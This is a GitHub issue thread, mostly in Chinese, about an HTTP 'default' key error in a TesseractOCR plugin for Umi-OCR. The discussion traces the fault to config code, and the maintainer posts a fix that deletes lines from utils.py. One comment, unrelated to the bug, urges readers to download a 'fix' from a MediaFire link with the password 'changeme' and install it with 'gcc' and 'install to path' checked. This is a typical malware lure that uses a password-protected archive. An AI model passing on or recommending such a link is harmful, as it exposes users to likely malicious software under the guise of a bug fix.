### ISSUE TITLE
tesseractOCR http请求时提示：options 解释失败。 'default'

### ISSUE THREAD

**Issue by catbiscuit** [qwedc001/tesseractOCR_umi_plugin#14]
1、报错问题是缺失default属性
(1)http方式才会报错
(2)可视化页面操作正常，不会报错

2、追溯
(1)api/ocr/get_options
"ocr.language": {
"title": "语言",
"type": "group",
"advanced": false
}
(2)UmiOCR-data\py_src\server\ocr_server.py
116行左右，opt[key] = default[key]["default"]
这里读取 ocr.language 的 default 属性报的错

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qwedc001** [comment]
你好，请问有详细的traceback吗，我尝试复现一下

**Comment by qwedc001** [comment]
并且看样子可能是Umi本体和插件联动的时候出了点问题 @hiroi-sora

**Comment by catbiscuit** [comment]
> 你好，请问有详细的traceback吗，我尝试复现一下

哦，sry，应该联动导致的问题。
完整的复现流程：
1、下载了tesseractOCR_umi_plugin仓库的最新releases中best版包
2、复制到UmiOCR-data\plugins文件，重命名为TesseractOCR_umi_plugin
3、按照仓库md的教程：Umi-OCR ，将 全局设置 → 文字识别 → 当前接口 改为 TesseractOCR
4、到这个步骤，直接用Umi-OCR.exe界面去进行OCR是正常的
5、但是使用http调用就会提示：options 解释失败。 'default'
6、Umi-OCR仓库下的代码
(1)搜索到了相关提示，定位代码：UmiOCR-data\py_src\server\ocr_server.py
116行左右，opt[key] = default[key]["default"]
(2)在读取到"ocr.language"对象时，因其没有"default"属性，抛出的异常

**Comment by hiroi-sora** [comment]
感谢提醒，经查实，是 python 端初始化配置字典时，误将 group 类型也加入了字典，导致的异常。 group 类型理应仅在 qml 端生效，而对 python 端透明。

这确实是 Umi-OCR 本体的问题，与此插件无关。

修复起来也很简单：
1. 打开 `UmiOCR-data\py_src\utils\utils.py`
2. 删掉 157~161 行，删掉如下的代码：
```python
                toDict[fullKey] = {
                    "title": config["title"],
                    "type": "group",
                    "advanced": config["advanced"],
                }
```

**Comment by catbiscuit** [comment]
> 感谢提醒，经查实，是 python 端初始化配置字典时，误将 group 类型也加入了字典，导致的异常。 group 类型理应仅在 qml 端生效，而对 python 端透明。
> 
> 这确实是 Umi-OCR 本体的问题，与此插件无关。
> 
> 修复起来也很简单：
> 
> 1. 打开 `UmiOCR-data\py_src\utils\utils.py`
> 2. 删掉 157~161 行，删掉如下的代码：
> 
> ```python
>                 toDict[fullKey] = {
>                     "title": config["title"],
>                     "type": "group",
>                     "advanced": config["advanced"],
>                 }
> ```

感谢回复
目前我是在取default属性时添加了判断，已经可以正常使用了。
